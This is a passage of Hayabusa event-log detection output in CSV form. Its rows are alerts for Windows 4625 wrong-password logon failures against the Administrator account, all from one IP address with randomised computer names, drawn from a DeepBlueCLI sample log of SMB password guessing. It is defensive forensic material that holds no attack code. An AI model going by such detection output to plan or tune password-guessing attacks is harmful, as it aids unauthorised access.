NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BdIAPiH32ZbmCgTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dEiN2xOA4E9Wl5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBeAez2fLjXB0dk3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gQ45aeMDc3Snabvv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWSYdr4lJlhCLMMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgxHY7072aUCdfa0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9yKhEodJDTVCGdIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z0odyPQmvkGRNWZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b5uRpG0fxCK75DPV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d9dcEzpJRW5YA8Bj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv3B9bwB1YIaBa6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJf9Obml4aVxE5zp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mvnSOaRSkGU6Uf5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JSAkZsZsv0SaLKaO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6rnM6QbwfbbrcGy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RX0GW7K5wdQJUx4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xm7CpD5i735McsvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bHxjZsnR25J47Ez8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1JWj91m79FyykH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h9i0GncOzpz5REWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BODZRJ6G3xxw29VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ2lq4piINfmI7Qe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NqDeXdOitJ3WY8w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FnoHQf7QDxoI4tel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqkbgrtBa5VFxPry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TMD57GtY15bfWBre | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3lT9UgWr82PcAjf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SpwhTfFlvvccnI5N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 10CfKdnvWf4UVuME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYLMax3okIqntHM1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qk9TPAK51EdVORwY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVKRUnNu2nGslW7P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJ2AYRLcMbMVixg6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Sl9ucxM2Nu3xjNq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AFeBGB6qA7OaYV7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLUEKG9CzQYsH3Vp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVZ44YKdRYY59zaC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: umU8pDDZFvvUVsHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nn7rA0uRegtHgaF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dgiakCKweT4GUGD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kptipiLujNVePYfy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: plaXJ1rEGpU3SzV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I4pALF2luLfg36GC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZLO4cufbFcRhRy8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a845OfrFKxy31Yhg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QnPM7uhs8y4BaP6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fW5FzQ4jbWDJxXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huKy3ruTPAlx94pI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g78Kx7hkMuUGIoX1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: erSXtXvMi8Cg1PWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VaqXgO2US87zoXLl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHEfAfFuAR2pX3LO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4Owk2elGaC5DOm1U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VXPynWzVNADN56a4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwfwZ0hXFaFwqymH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYlZwLsvrsuqUZ4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvGrzr30eVl5TGhA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tqdJcHWbdGcIIHBr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDt69bIJ1yI6PXLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtE2uMuOe8QPAKOj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BWQDlZDgFj9NmMhJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncQiyLyHCXr8knGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XjVmLfmcPMYbmdin | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gU2HjzjDxHsnvENI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cUPn5CEz2LtwRwvZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCz069oBFXqpshbU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dzhc9PVRVP69tshD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejA3ZNfKWEs8zAMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U5egiL2PGOrYCHv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYhIM3zla6KcbKbM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjyQJnVBO4iC9Tkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g6Tpp8TRa2nRxHzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DyLvo5Bn2HzyANdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaXNThuZDGqJ7oCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 42Sb7p19cQsEV30b | IP Addr: 192.168.198.149 | AuthPackage: 